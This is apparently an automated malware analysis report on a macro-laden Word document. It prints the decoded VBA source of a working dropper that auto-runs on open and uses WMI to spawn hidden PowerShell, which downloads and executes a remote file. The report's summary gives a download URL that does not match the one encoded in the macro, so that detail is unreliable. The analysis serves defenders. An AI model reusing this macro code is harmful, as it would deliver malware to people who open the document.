Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate/Decode Files or Information
The sample contains VBA macros, specifically a Document_Open macro, which is designed to execute automatically when the document is opened. The script utilizes GetObject and CallByName functions, indicative of malicious activity. It also attempts to deobfuscate a URL, which is reconstructed as 'http://10.10.10.10/payload.exe', likely to download and execute a second-stage payload. The presence of a lure to enable macros further supports its role as a dropper.
Heuristics (8)
- ClamAV: Doc.Dropper.Agent-6609966-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6609966-0
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
- CallByName call (high) [OLE_VBA_CALLBYNAME]: CallByName call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium) [SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11869 bytes |

SHA-256 of macros.bas: 235f192f9fd51be7f50fd8e629b938a1bd98911f27fc1aa440609b3e34c63ffe
Preview script: first 1,000 lines of the extracted script. Comments prefixed with "analyst:" were added during review and are not part of the sample; olevba concatenates the four extracted modules, each beginning with its own Attribute VB_Name line.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' analyst: auto-executes when the document is opened and hands off to module NZQKqDR
Private Sub Document_Open()
    NZQKqDR.KjUkKq
End Sub

Attribute VB_Name = "NZQKqDR"

' analyst: kuduCAOi, IbXfhxrJJc, edOcMf and qaxHHrOCC are padding; they are not called
' from the visible execution path and reference names not defined in the visible source
Private Sub kuduCAOi(ByVal tnSlu As Boolean)
    oPRmuELT "KL", "3ejb"
End Sub

Private Function IbXfhxrJJc() As String
    rGOlje
    ucajllP "geF", 9495, "Ra"
    zmIjoW
    IbXfhxrJJc = "Sd"
End Function

Private Function edOcMf(ByVal VJPWRiqp As Integer, ByVal GzGGu As Integer) As String
    cwTuzIh
    hCaKEOVWe
    edOcMf = "7woXm"
End Function

' analyst: entry point reached from Document_Open
Public Sub KjUkKq()
    QYovCspQ
End Sub

' analyst: the real payload path. Every string is passed through XRUBkqC.DTDSN, which
' strips the characters of the first argument (the key) from the second argument.
Private Sub QYovCspQ()
    Dim AxTlWNSO As String
    LfvRp = False
    ' analyst: any failure jumps to the empty label at the end, so errors are swallowed silently
    On Error GoTo IHfNbKV
    ' analyst: decodes to a WMI moniker for the Win32_ProcessStartup class
    Set hzqLURbz = GetObject(XRUBkqC.DTDSN("8/hVGO", "VwGihnVmGgVm8tGsh:\/\V.V\V/r8oVothG\Vci/mGvhO2:/W8hin83G2O_GPOr88oche8sO/sGSGtGar8tV/uph"))
    Set rxOeAtpbsz = hzqLURbz.SpawnInstance_
    EdoCydMX = 8218
    ' analyst: property name decodes to "ShowWindow"; call type 4 is VbLet, value 0 hides the window
    CallByName rxOeAtpbsz, XRUBkqC.DTDSN("0JmjA6Hv", "vSmhHo6w6WiHnHHd0owv"), 4, 0
    ' analyst: decodes to a WMI moniker for the Win32_Process class
    Set dKTfQViYsS = GetObject(XRUBkqC.DTDSN("pax9zL1Gh", "waiGna9m1gGmptsG:aG\\h.xx\rGaooL1tp\c1aimavp2L:xWLpin9132x_zLPLroLzcLezssh"))
    ' analyst: Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation);
    ' the process is spawned by the WMI provider host rather than as a child of WINWORD.EXE
    dKTfQViYsS.Create DhusH, Null, rxOeAtpbsz
    Exit Sub
IHfNbKV:
End Sub

Private Function qaxHHrOCC() As String
    FsJzcvSy 1330, "9Pwo"
    CsGwZeejaq "N2XQ"
    lgbrCrlAnY True, ""
    If EwlTvT("FVY6W", 4658) Then
        EkmYQ False
    End If
    qaxHHrOCC = ""
End Function

' analyst: builds the command line for Win32_Process.Create. With the key stripped it is a
' powershell.exe invocation (hidden window, execution policy bypassed) that sleeps, downloads
' a file from a remote URL into a temporary file and executes it via WScript.Shell
Private Function DhusH() As String
    Dim CwUNycyRG As Integer
    JeeWwjmGG = "Rz6yE"
    DhusH = XRUBkqC.DTDSN("916kKQX8U", "1pQo9w8eUrsKXheKkl8l.QKexKeKU X-E89xUecKuXKt9iQoQnP6Uo1li9cUyU KBKQyp9a8Qs6s1 K-W19inXd8oQ9wS98t8y1le9 6KHi9dkdK6enk UX-cKo8kmkma8n1Kd U8SUtXa6rtUU-SQkl8e6ekp 8-19s 131Q00U;8 68$fKiUl81en1a1m99e=1U[Skkys8KteQm1.1I8OX.UkP8at6hK]16::8GX9etXT8keUmpKFUkiXl1e9Na8mUe1Q(9);Xk(NKekw9-1O6kbjkeKc6tKK USyXUstKeKXmX.9N1etK.KXWe9bXC6Xl1iekn9tk)Q.88DoUUw8nklKokadQFKKiQl9e6('Qh6tUXtkpX:U//1Qpr1iU8nt1cKl1u86e8.kcKomKX/iXmKaKgUeQ6/6miQ1c9rkosKo9Xft8.KpknkgX1'6, 8$1fkKil86e6n8amUke)1Q;1(NXQe8w-QkObQjU1ec18tU 6-c1kom68 9WS11c6riXp89t.6KSQheQlXlkX).6XEUxeKKcU(K$fKiKl69en8a1kmeKQ)")
End Function

Attribute VB_Name = "XRUBkqC"

' analyst: returns the character GaaosU unchanged if it does not occur in the key eJJMkQJd;
' for key characters the function result is left as an empty string, which drops them
Private Function YsrNkR(ByVal GaaosU As String, ByVal eJJMkQJd As String) As String
    Dim RqwvWLS As Integer
    If Not ZnSCpmO.rWjpxtn(eJJMkQJd, GaaosU) Then
        YsrNkR = GaaosU
        lfmln = "lCgM"
    End If
End Function

' analyst: padding, not reached
Private Sub EdMsmvLSh()
    UFOsQzczwN "HoM"
    StfbIw
    rlnOBtG
    CyrXo
    MJZjZDjH
End Sub

' analyst: always returns 1, used as the loop start index below
Private Function pOXdE() As Integer
    Dim jjYnIql As String
    WmXWPWnCL = "An"
    pOXdE = 1
End Function

' analyst: the deobfuscation routine. Walks XoNeBBU one character at a time and
' concatenates only those characters that are absent from the key NQaOrcoA.
Public Function DTDSN(ByVal NQaOrcoA As String, ByVal XoNeBBU As String) As String
    Dim mNQFllxN As Integer, Hazlu As String
    For kmjFnY = pOXdE To ZnSCpmO.Bzrabcwj(XoNeBBU)
        DTDSN = ZnSCpmO.rMBxdHDFUD(DTDSN, YsrNkR(ZnSCpmO.FwmzNM(XoNeBBU, kmjFnY), NQaOrcoA))
    Next
End Function

' analyst: xadVt, fpYmPb and BXCFvWsGN are padding, not reached
Private Sub xadVt(ByVal clOBHCJ As String, ByVal znVUjikyk As Integer)
    uHPjFY False, "rqFJ"
    NZGYizT
End Sub

Private Sub fpYmPb()
    YfzBXQ
    vIJFnzz
    If NwWBe Then
        OKcKxg
        uRqyg False, "WjG"
    Else
        QtxXxGQPK
    End If
    nwrztBd "tKrTg"
    SndKT
    hFMjkKf
End Sub

Private Function BXCFvWsGN(ByVal RydchSEuE As Integer, ByVal PuWCP As String) As Integer
    wqZJuMHO 4290, 4004
    WWdolpcM
    KzSklnWw "fe", "egji", ""
    BXCFvWsGN = 5023
End Function

Attribute VB_Name = "ZnSCpmO"

' analyst: thin wrappers around Mid, &, Len and InStr so that the built-in names
' do not appear in the string-handling code
Public Function FwmzNM(ByVal wGMAfDITku As String, ByVal RllOXB As Integer) As String
    Dim pxZSTSyLrK As Boolean
    Dim rrKREUZ As Integer
    FwmzNM = Mid(wGMAfDITku, RllOXB, 1)
End Function

Public Function rMBxdHDFUD(ByVal FuLEHSPoM As String, ByVal KBAdadFgm As String) As String
    rMBxdHDFUD = FuLEHSPoM & KBAdadFgm
End Function

Public Function Bzrabcwj(ByVal yUpWOs As String) As Integer
    Dim NGlcLUq As String
    Bzrabcwj = Len(yUpWOs)
End Function

Public Function rWjpxtn(ByVal vAoXjv As String, ByVal vESMq As String) As Boolean
    Dim YDkxM As Boolean, MRvwvJoo As Boolean
    vEWIlHD = "bVl7"
    rWjpxtn = InStr(1, vAoXjv, vESMq) <> 0
End Function
```

... (truncated)